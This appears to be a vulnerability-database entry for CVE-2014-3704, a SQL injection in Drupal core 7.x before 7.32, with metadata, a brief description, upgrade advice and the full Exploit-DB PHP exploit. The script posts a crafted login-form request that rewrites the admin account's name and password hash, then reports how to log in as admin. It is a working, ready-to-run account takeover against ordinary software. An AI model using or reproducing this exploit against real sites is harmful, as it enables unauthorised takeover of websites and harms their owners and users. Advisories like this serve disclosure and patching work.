Drupal core 7.x - SQL Injection

vendor:

Drupal core 7.x

by:

Dustin Dörr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Drupal core 7.x

Affected Version From: Drupal core 7.x versions prior to 7.32

Affected Version To: Drupal core 7.x versions prior to 7.32

Patch Exists: YES

Related CWE: CVE-2014-3704

CPE: a:drupal:drupal

Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-vid-6f825fa4-5560-11e4-a4c3-00a0986f28c4/, https://www.rapid7.com/db/vulnerabilities/drupal-cve-2014-3704/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

Drupal core 7.x – SQL Injection

This exploit allows an attacker to inject malicious SQL code into a vulnerable Drupal website. The malicious code is sent as part of a POST request to the website, which then executes the code and allows the attacker to gain access to the website. The exploit is triggered by sending a specially crafted POST request to the website, which contains the malicious SQL code.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Drupal core 7.x (7.32 or later). Additionally, it is recommended to apply the latest security patches and ensure that all web applications are kept up to date.

Source

Exploit-DB raw data:

<?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32                             #
# CVE: CVE-2014-3704                                                          #
#-----------------------------------------------------------------------------#

$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";

$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);

if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>